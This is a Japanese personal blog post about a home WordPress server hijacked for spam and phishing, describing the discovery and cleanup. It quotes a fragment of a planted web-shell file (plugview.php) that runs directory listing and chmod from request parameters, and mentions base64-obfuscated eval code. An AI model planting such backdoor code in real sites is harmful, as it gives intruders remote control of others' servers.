いやぁ、お恥ずかしい話なんですが、SPAMや、フィッシングの踏み台にされました。

ある朝のこと、たまたまWebサーバのディレクトリのルートをlsすると見に覚えの無いディレクトリが。。。

なんじゃこりゃ。dyb/やらozb/やら。

中には、 全く知らないサイトへリダイレクトするコードが、index.phpの中に。。あ、やられた。

ということで、応急処置。とりあえず、ルートを掃除して、今までついていた、書き込み権を消す、パスワードを変更。あとは、仕事から帰ってきてからじっくりやるか。。。

仕事から帰ってきてみると、うちのインターネットのプロバイダのAT&Tからメールが、、、

AT&T IISS Network Security

Your AT&T U-verse Site ID is: XXXX IP: XXX.XXX.XXX.XXX (issue XXXX)

IMPORTANT COMPUTER SAFETY NOTICE from AT&T Internet Services
Security Center -“Suspicious email traffic detected”.

最初、ただのSPAMかと思った。でも、Billing Acctの下4桁が書かれてて、ちゃんと合ってるし、ぐぐってみると、本物っぽい。Suspicious email traffiということで、SPAMの踏み台にされたのが確定。

あっちゃ〜。

ということで、家中のパソコンのLANケーブルをぶっこ抜いて、隔離。

あ〜あ、やっちゃった。と凹みつつも、家中のパソコンのウィルスチェック。サーバー以外の感染は認められない。

ということで、サーバの中を探索。/var/wwwの中をごそごそと覗く。

wordpressの中に、wp-content/robots1FzZ.phpなるファイルを発見。中には、$vで始まる文字列の塊でphpのコードが書かれている。MAIL FROMとかの文字列も見られる。こいつか〜。やられたな〜。

それ以外にも、wp-content/themesの中の現在使っているテーマのphpも見に覚えの無いファイルがいくつか。eval ( base64_decode(“…で偽装しているファイルがあったり。

plugview.phpなるファイルなんて

switch ($_REQUEST[‘a’])
{
case ‘ls’ :
show_ls($_REQUEST[‘p1’]);
break;
case ‘chmod’ :
chmod ($_REQUEST[‘p1’], $_REQUEST[‘p2’]);
show_ls();
break;

なーんてなコードが。。。

まじっすか。この時点で、このハードディスクのフォーマットを決心。

全部のバックアップはあるんだけど、どの時点でもらってるのか不安だし、MySqlのDBを書き戻して、DBの中にスクリプト埋められてて再発してもな〜。そのまま書き戻すんじゃなくて、ひとつひとつ確認しながら作りなおしたほうがいいよなー。ということで、サイトの再構築が始まったのでした。